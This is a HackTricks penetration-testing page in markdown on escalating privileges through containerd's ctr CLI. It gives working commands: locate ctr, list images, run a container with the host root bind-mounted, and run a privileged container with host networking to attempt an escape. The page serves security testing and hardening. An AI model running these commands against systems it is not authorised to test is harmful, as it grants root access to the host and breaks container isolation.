containerd-ctr-privilege-escalation.md (3186B)
1 --- 2 title: "Containerd (ctr) Privilege Escalation" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Containerd (ctr) Privilege Escalation 14 15 ## Basic information 16 17 Go to the following link to learn **where `containerd` and `ctr` fit in the container stack**: 18 19 [Runtimes And Engines](/hacktricks/linux-hardening/containers-namespaces/container-security/runtimes-and-engines) 20 21 ## PE 1 22 23 If you find that a host contains the `ctr` command, the native CLI bundled with containerd:<sup>[[1]](#references)</sup> 24 25 ```bash 26 which ctr 27 /usr/bin/ctr 28 ``` 29 30 You can list the images known to containerd:<sup>[[2]](#references)</sup> 31 32 ```bash 33 ctr image list 34 REF TYPE DIGEST SIZE PLATFORMS LABELS 35 registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - 36 registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - 37 ``` 38 39 Then **run one of those images with the host root recursively bind-mounted at the container root**:<sup>[[3]](#references)[[4]](#references)</sup> 40 41 ```bash 42 ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash 43 ``` 44 45 ## PE 2 46 47 Run a container in privileged mode and test for an escape.\ 48 You can run a privileged container using host networking as:<sup>[[5]](#references)[[6]](#references)</sup> 49 50 ```bash 51 ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash 52 ``` 53 54 `--privileged` grants the process the caller's effective Linux capabilities and removes several isolation controls, but an escape remains environment-dependent; use the techniques mentioned in the following page to test for it:<sup>[[5]](#references)</sup> 55 56 [Container Security](/hacktricks/linux-hardening/containers-namespaces/container-security/overview) 57 58 ## References 59 60 - [1] [Getting started with containerd](https://github.com/containerd/containerd/blob/main/docs/getting-started.md) 61 - [2] [ctr image command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/images/images.go) 62 - [3] [ctr run command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/run/run.go) 63 - [4] [Linux kernel shared-subtree documentation](https://docs.kernel.org/filesystems/sharedsubtree.html) 64 - [5] [containerd OCI package: `WithPrivileged`](https://pkg.go.dev/github.com/containerd/containerd%40v1.7.33/oci) 65 - [6] [containerd `ctr` command flags](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/commands.go)